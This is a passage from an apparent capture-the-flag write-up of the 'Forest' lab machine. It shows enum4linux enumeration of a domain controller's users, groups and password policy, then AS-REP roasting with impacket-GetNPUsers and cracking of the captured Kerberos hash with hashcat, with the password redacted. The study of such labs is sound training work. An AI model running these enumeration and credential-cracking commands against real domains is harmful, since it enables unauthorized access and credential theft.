Group 'Delegated Setup' (RID: 1113) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Service Accounts' (RID: 1148) has member: Could not connect to server 10.10.10.161
Group 'Service Accounts' (RID: 1148) has member: The username or password was not correct.
Group 'Service Accounts' (RID: 1148) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Domain Guests' (RID: 514) has member: Could not connect to server 10.10.10.161
Group 'Domain Guests' (RID: 514) has member: The username or password was not correct.
Group 'Domain Guests' (RID: 514) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Managed Availability Servers' (RID: 1120) has member: Could not connect to server 10.10.10.161
Group 'Managed Availability Servers' (RID: 1120) has member: The username or password was not correct.
Group 'Managed Availability Servers' (RID: 1120) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Hygiene Management' (RID: 1114) has member: Could not connect to server 10.10.10.161
Group 'Hygiene Management' (RID: 1114) has member: The username or password was not correct.
Group 'Hygiene Management' (RID: 1114) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Enterprise Key Admins' (RID: 527) has member: Could not connect to server 10.10.10.161
Group 'Enterprise Key Admins' (RID: 527) has member: The username or password was not correct.
Group 'Enterprise Key Admins' (RID: 527) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Cloneable Domain Controllers' (RID: 522) has member: Could not connect to server 10.10.10.161
Group 'Cloneable Domain Controllers' (RID: 522) has member: The username or password was not correct.
Group 'Cloneable Domain Controllers' (RID: 522) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Records Management' (RID: 1110) has member: Could not connect to server 10.10.10.161
Group 'Records Management' (RID: 1110) has member: The username or password was not correct.
Group 'Records Management' (RID: 1110) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Public Folder Management' (RID: 1107) has member: Could not connect to server 10.10.10.161
Group 'Public Folder Management' (RID: 1107) has member: The username or password was not correct.
Group 'Public Folder Management' (RID: 1107) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Schema Admins' (RID: 518) has member: Could not connect to server 10.10.10.161
Group 'Schema Admins' (RID: 518) has member: The username or password was not correct.
Group 'Schema Admins' (RID: 518) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Security Administrator' (RID: 1117) has member: Could not connect to server 10.10.10.161
Group 'Security Administrator' (RID: 1117) has member: The username or password was not correct.
Group 'Security Administrator' (RID: 1117) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Group 'Enterprise Admins' (RID: 519) has member: Could not connect to server 10.10.10.161
Group 'Enterprise Admins' (RID: 519) has member: The username or password was not correct.
Group 'Enterprise Admins' (RID: 519) has member: Connection failed: NT_STATUS_LOGON_FAILURE
=======================================================================
| Users on 10.10.10.161 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
=============================================
| Getting printer info for 10.10.10.161 |
=============================================
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Thu Dec 16 12:57:44 2021
------------------------------------------------
ENUM4LINUX - next generation
==========================
| Target Information |
==========================
[*] Target ........... 10.10.10.161
[*] Username ......... ''
[*] Random Username .. 'ehriiael'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
====================================
| Service Scan on 10.10.10.161 |
====================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
====================================================
| Domain Information via LDAP for 10.10.10.161 |
====================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: htb.local
====================================================
| NetBIOS Names and Workgroup for 10.10.10.161 |
====================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out
=========================================
| SMB Dialect Check on 10.10.10.161 |
=========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
SMB 1.0: true
SMB 2.02: true
SMB 2.1: true
SMB 3.0: true
SMB1 only: false
Preferred dialect: SMB 3.0
SMB signing required: true
=========================================
| RPC Session Check on 10.10.10.161 |
=========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user session
[-] Could not establish random user session: STATUS_LOGON_FAILURE
===================================================
| Domain Information via RPC for 10.10.10.161 |
===================================================
[+] Domain: HTB
[+] SID: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
===========================================================
| Domain Information via SMB session for 10.10.10.161 |
===========================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: FOREST
NetBIOS domain name: HTB
DNS domain: htb.local
FQDN: FOREST.htb.local
===============================================
| OS Information via RPC for 10.10.10.161 |
===============================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows Server 2016 Standard 14393
OS version: '10.0'
OS release: '1607'
OS build: '14393'
Native OS: Windows Server 2016 Standard 14393
Native LAN manager: Windows Server 2016 Standard 6.3
Platform id: null
Server type: null
Server type string: null
=====================================
| Users via RPC on 10.10.10.161 |
=====================================
[*] Enumerating users via 'querydispinfo'
[+] Found 31 users via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 31 users via 'enumdomusers'
[+] After merging user results we have 31 users total:
'1123':
username: $331000-VK4ADACQNUCA
name: (null)
acb: '0x00020015'
description: (null)
'1124':
username: SM_2c8eef0a09b545acb
name: Microsoft Exchange Approval Assistant
acb: '0x00020011'
description: (null)
'1125':
username: SM_ca8c2ed5bdab4dc9b
name: Microsoft Exchange
acb: '0x00020011'
description: (null)
'1126':
username: SM_75a538d3025e4db9a
name: Microsoft Exchange
acb: '0x00020011'
description: (null)
'1127':
username: SM_681f53d4942840e18
name: Discovery Search Mailbox
acb: '0x00020011'
description: (null)
'1128':
username: SM_1b41c9286325456bb
name: Microsoft Exchange Migration
acb: '0x00020011'
description: (null)
'1129':
username: SM_9b69f1b9d2cc45549
name: Microsoft Exchange Federation Mailbox
acb: '0x00020011'
description: (null)
'1130':
username: SM_7c96b981967141ebb
name: E4E Encryption Store - Active
acb: '0x00020011'
description: (null)
'1131':
username: SM_c75ee099d0a64c91b
name: Microsoft Exchange
acb: '0x00020011'
description: (null)
'1132':
username: SM_1ffab36a2f5f479cb
name: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}
acb: '0x00020011'
description: (null)
'1134':
username: HealthMailboxc3d7722
name: HealthMailbox-EXCH01-Mailbox-Database-1118319013
acb: '0x00000210'
description: (null)
'1135':
username: HealthMailboxfc9daad
name: HealthMailbox-EXCH01-001
acb: '0x00000210'
description: (null)
'1136':
username: HealthMailboxc0a90c9
name: HealthMailbox-EXCH01-002
acb: '0x00000210'
description: (null)
'1137':
username: HealthMailbox670628e
name: HealthMailbox-EXCH01-003
acb: '0x00000210'
description: (null)
'1138':
username: HealthMailbox968e74d
name: HealthMailbox-EXCH01-004
acb: '0x00000210'
description: (null)
'1139':
username: HealthMailbox6ded678
name: HealthMailbox-EXCH01-005
acb: '0x00000210'
description: (null)
'1140':
username: HealthMailbox83d6781
name: HealthMailbox-EXCH01-006
acb: '0x00000210'
description: (null)
'1141':
username: HealthMailboxfd87238
name: HealthMailbox-EXCH01-007
acb: '0x00000210'
description: (null)
'1142':
username: HealthMailboxb01ac64
name: HealthMailbox-EXCH01-008
acb: '0x00000210'
description: (null)
'1143':
username: HealthMailbox7108a4e
name: HealthMailbox-EXCH01-009
acb: '0x00000210'
description: (null)
'1144':
username: HealthMailbox0659cc1
name: HealthMailbox-EXCH01-010
acb: '0x00000210'
description: (null)
'1145':
username: sebastien
name: Sebastien Caron
acb: '0x00000210'
description: (null)
'1146':
username: lucinda
name: Lucinda Berger
acb: '0x00000210'
description: (null)
'1147':
username: svc-alfresco
name: svc-alfresco
acb: '0x00010210'
description: (null)
'1150':
username: andy
name: Andy Hislip
acb: '0x00000210'
description: (null)
'1151':
username: mark
name: Mark Brandt
acb: '0x00000210'
description: (null)
'1152':
username: santi
name: Santi Rodriguez
acb: '0x00000210'
description: (null)
'500':
username: Administrator
name: Administrator
acb: '0x00000010'
description: Built-in account for administering the computer/domain
'501':
username: Guest
name: (null)
acb: '0x00000215'
description: Built-in account for guest access to the computer/domain
'502':
username: krbtgt
name: (null)
acb: '0x00000011'
description: Key Distribution Center Service Account
'503':
username: DefaultAccount
name: (null)
acb: '0x00000215'
description: A user account managed by the system.
======================================
| Groups via RPC on 10.10.10.161 |
======================================
[*] Enumerating local groups
[+] Found 5 groups via 'enumalsgroups domain'
[*] Enumerating builtin groups
[+] Found 29 groups via 'enumalsgroups builtin'
[*] Enumerating domain groups
[+] Found 38 groups via 'enumdomgroups'
[+] After merging groups results we have 72 groups total:
'1101':
groupname: DnsAdmins
type: local
'1102':
groupname: DnsUpdateProxy
type: domain
'1104':
groupname: Organization Management
type: domain
'1105':
groupname: Recipient Management
type: domain
'1106':
groupname: View-Only Organization Management
type: domain
'1107':
groupname: Public Folder Management
type: domain
'1108':
groupname: UM Management
type: domain
'1109':
groupname: Help Desk
type: domain
'1110':
groupname: Records Management
type: domain
'1111':
groupname: Discovery Management
type: domain
'1112':
groupname: Server Management
type: domain
'1113':
groupname: Delegated Setup
type: domain
'1114':
groupname: Hygiene Management
type: domain
'1115':
groupname: Compliance Management
type: domain
'1116':
groupname: Security Reader
type: domain
'1117':
groupname: Security Administrator
type: domain
'1118':
groupname: Exchange Servers
type: domain
'1119':
groupname: Exchange Trusted Subsystem
type: domain
'1120':
groupname: Managed Availability Servers
type: domain
'1121':
groupname: Exchange Windows Permissions
type: domain
'1122':
groupname: ExchangeLegacyInterop
type: domain
'1133':
groupname: $D31000-NSEL5BRJ63V7
type: domain
'1148':
groupname: Service Accounts
type: domain
'1149':
groupname: Privileged IT Accounts
type: domain
'498':
groupname: Enterprise Read-only Domain Controllers
type: domain
'5101':
groupname: test
type: domain
'512':
groupname: Domain Admins
type: domain
'513':
groupname: Domain Users
type: domain
'514':
groupname: Domain Guests
type: domain
'515':
groupname: Domain Computers
type: domain
'516':
groupname: Domain Controllers
type: domain
'517':
groupname: Cert Publishers
type: local
'518':
groupname: Schema Admins
type: domain
'519':
groupname: Enterprise Admins
type: domain
'520':
groupname: Group Policy Creator Owners
type: domain
'521':
groupname: Read-only Domain Controllers
type: domain
'522':
groupname: Cloneable Domain Controllers
type: domain
'525':
groupname: Protected Users
type: domain
'526':
groupname: Key Admins
type: domain
'527':
groupname: Enterprise Key Admins
type: domain
'544':
groupname: Administrators
type: builtin
'545':
groupname: Users
type: builtin
'546':
groupname: Guests
type: builtin
'548':
groupname: Account Operators
type: builtin
'549':
groupname: Server Operators
type: builtin
'550':
groupname: Print Operators
type: builtin
'551':
groupname: Backup Operators
type: builtin
'552':
groupname: Replicator
type: builtin
'553':
groupname: RAS and IAS Servers
type: local
'554':
groupname: Pre-Windows 2000 Compatible Access
type: builtin
'555':
groupname: Remote Desktop Users
type: builtin
'556':
groupname: Network Configuration Operators
type: builtin
'557':
groupname: Incoming Forest Trust Builders
type: builtin
'558':
groupname: Performance Monitor Users
type: builtin
'559':
groupname: Performance Log Users
type: builtin
'560':
groupname: Windows Authorization Access Group
type: builtin
'561':
groupname: Terminal Server License Servers
type: builtin
'562':
groupname: Distributed COM Users
type: builtin
'568':
groupname: IIS_IUSRS
type: builtin
'569':
groupname: Cryptographic Operators
type: builtin
'571':
groupname: Allowed RODC Password Replication Group
type: local
'572':
groupname: Denied RODC Password Replication Group
type: local
'573':
groupname: Event Log Readers
type: builtin
'574':
groupname: Certificate Service DCOM Access
type: builtin
'575':
groupname: RDS Remote Access Servers
type: builtin
'576':
groupname: RDS Endpoint Servers
type: builtin
'577':
groupname: RDS Management Servers
type: builtin
'578':
groupname: Hyper-V Administrators
type: builtin
'579':
groupname: Access Control Assistance Operators
type: builtin
'580':
groupname: Remote Management Users
type: builtin
'581':
groupname: System Managed Accounts Group
type: builtin
'582':
groupname: Storage Replica Administrators
type: builtin
======================================
| Shares via RPC on 10.10.10.161 |
======================================
[*] Enumerating shares
[+] Found 0 share(s) for user '' with password '', try a different user
=========================================
| Policies via RPC for 10.10.10.161 |
=========================================
[*] Trying port 445/tcp
[+] Found policy:
domain_password_information:
pw_history_length: 24
min_pw_length: 7
min_pw_age: 1 day 4 minutes
max_pw_age: not set
pw_properties:
- DOMAIN_PASSWORD_COMPLEX: false
- DOMAIN_PASSWORD_NO_ANON_CHANGE: false
- DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false
- DOMAIN_PASSWORD_LOCKOUT_ADMINS: false
- DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false
- DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false
domain_lockout_information:
lockout_observation_window: 30 minutes
lockout_duration: 30 minutes
lockout_threshold: None
domain_logoff_information:
force_logoff_time: not set
=========================================
| Printers via RPC for 10.10.10.161 |
=========================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED
Completed after 21.96 seconds
Using the list of usernames we gathered previously we can try AS-REP roasting. Here's a short blurb about AS-REP roasting:
The attack has two parts; the first is requesting an AS-REP ticket from the Domain Controller (or more specifically, the KDC). If pre-authentication is disabled for that, it will disclose if a user with the given username exists and supply a piece of data encrypted with the users password. Many people will habitually correct this to say βWell actually, you mean hashed not encrypted!β, however in this instance encrypted is correct, as can be seen in RFC4120. The encrypted part is signed with the client key, which allows us to perform a bruteforce attack to determine the userβs password. Performing the attack is possible either with Impacket or Rubeus.
Here I am running impacket-GetNPUsers against the forest.htb domain controller in the htb.local/ domain. We're also passing -outputfile and -format so that we save the found hashes and save them in hashcat format as well. -no-pass is helpful so that we're not potentially asked for any passwords... since we don't have any anyways.
$ impacket-GetNPUsers -outputfile hashes.txt -format hashcat -usersfile usernames -dc-ip forest.htb -no-pass htb.local/ | tee 10.10.10.161.$(basename $PWD).impacket-getnpusers.txt
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User HealthMailbox0659cc1 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox670628e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox6ded678 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox7108a4e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox83d6781 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox968e74d doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxb01ac64 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxc0a90c9 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxc3d7722 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxfc9daad doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxfd87238 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
We were able to recover a Kerberos has and from here can find out the mode for hashcat and then crack the hash using hashcat:
$ nth -af hashes.txt | tail -3
Most Likely
Kerberos 5 AS-REP etype 23, HC: 18200 JtR: krb5pa-sha1 Summary: Used for Windows Active Directory
$ hashcat --show -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt
[email protected]:1e708e6ce68f79c142a742ba8ec07754$03a859b16e325ff3c223485dfd613c7bb1fc28769cb05cc48ca76fbe9f9e751674b76c125743f3a93ca80512003ad30694a7f73689c7be9d64616d3e767a4ea9cd393006ffb21136d0c2ad032624f2c7e5ecb8a4f72ad9d91b4084299384e3f16e31fcd2916f1bef2ec9dd8bae2ba33e3dadf3c0b3a12751eef81ac3c73b0bb64104a6e2e7dbc7531661f2ae269f78e1c6c15b1fdbda5d2c2410badccde237ef50ef967365f7db182a291d2c530cbd8576ce7bb18081af005a89cb6b325572e022b169e78dbf93fcdf5cf14b29a07634dcb870219ed72b3143ea2a08763e72cc860d8e8ff015:r3dacted
From here I am going to try to use evil-winrm to connect and run scripts on the remote machine with the credentials we got.